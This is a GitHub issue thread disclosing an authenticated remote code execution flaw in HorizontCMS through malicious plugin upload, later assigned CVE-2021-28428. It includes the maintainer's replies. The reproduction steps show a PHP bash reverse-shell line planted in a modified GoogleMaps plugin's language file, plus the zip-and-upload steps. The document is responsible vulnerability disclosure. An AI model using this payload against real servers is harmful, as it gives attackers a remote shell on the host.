Authenticated Remote Code Execution via a Malicious Plugin Upload

[bigb0sss]

Description of the Issue

One who is able to log into the admin panel can gain Remote Code Execution via uploading a malicious Plugin file via Plugins upload functionality.

Reproduction of the Issue

1. Login to the admin panel (http:///admin/login)
2. Prepare the malicious plugin file (We used a sample GoogleMaps (https://github.com/ttimot24/GoogleMaps) file and modified the "/resources/lang/en/message.php" to introduce our own PHP code)

   
   <?php 

$shell = exec("/bin/bash -c 'bash -i >& /dev/tcp//9001 0>&1'");

return [ 'successfully_added_location' => $shell, //'Location added succesfully!', 'successfully_deleted_location' => 'Location deleted succesfully!', 'successfully_set_center' => 'Location is successfully set as map center!' ];

3. Zip the GoogleMaps plugin folder and upload it via Plugins functionality in the admin portal.
4. Install & activate the Plugins
5. Using "Add location" add an arbitrary location and click "Save" --> When its condition is met for "successfully_added_location," it will run our code ($shell) instead of printing out the original message 'Location added succesfully!'

## Screenshots
* Modifying the message.php file in the sample GoogleMaps plugin file:
![10](https://user-images.githubusercontent.com/49355913/111086742-52bdf700-84f4-11eb-9dcb-a2cecdcdbd0d.png)

* Zip and upload the GoogleMaps plugin:
```console
$ zip -r google.zip GoogleMaps

• Install --> Activate --> Google Maps Plugin is created in the menu bar:

• Add location --> Click Save (to initiate the message.php code)

• Listener Receiving a Reverse Shell

Root Cause

• The application is taking an arbitrary plugin file and execute the user supplied PHP code without proper sanitization.

Please let us know if you have any questions or need further information. Thanks.

Daniel Min & Chi Tran

[bigb0sss]

Hi @ttimot24,

Hope all is well. Thank you for labeling the issues as security. We are wondering if you are planning to remediate the issues any time soon. If not, would it be okay for us to write a short blog about our findings on the HorizontCMS? Thanks.

[ttimot24]

Hi @bigb0sss,

I'm planning to fix this security issue. My schedule is a bit busy, so I think it will be fixed in April.

Feel free to write about it on your blog.

[bigb0sss]

Hi @ttimot24,

Hope all is well.

We know you are still busy, but we just wanted to follow up again to see if the issues have been fixed?

If so, would you please point us to the updated code?

Please let us know if you have any questions. Thanks!

[bigb0sss]

Hi @ttimot24,

Hope all is well. CVE-2021-28428 (https://www.cve.org/CVERecord?id=CVE-2021-28428) was assigned for this issue. Thanks again for the prompt fix for the vulnerability.

All the best,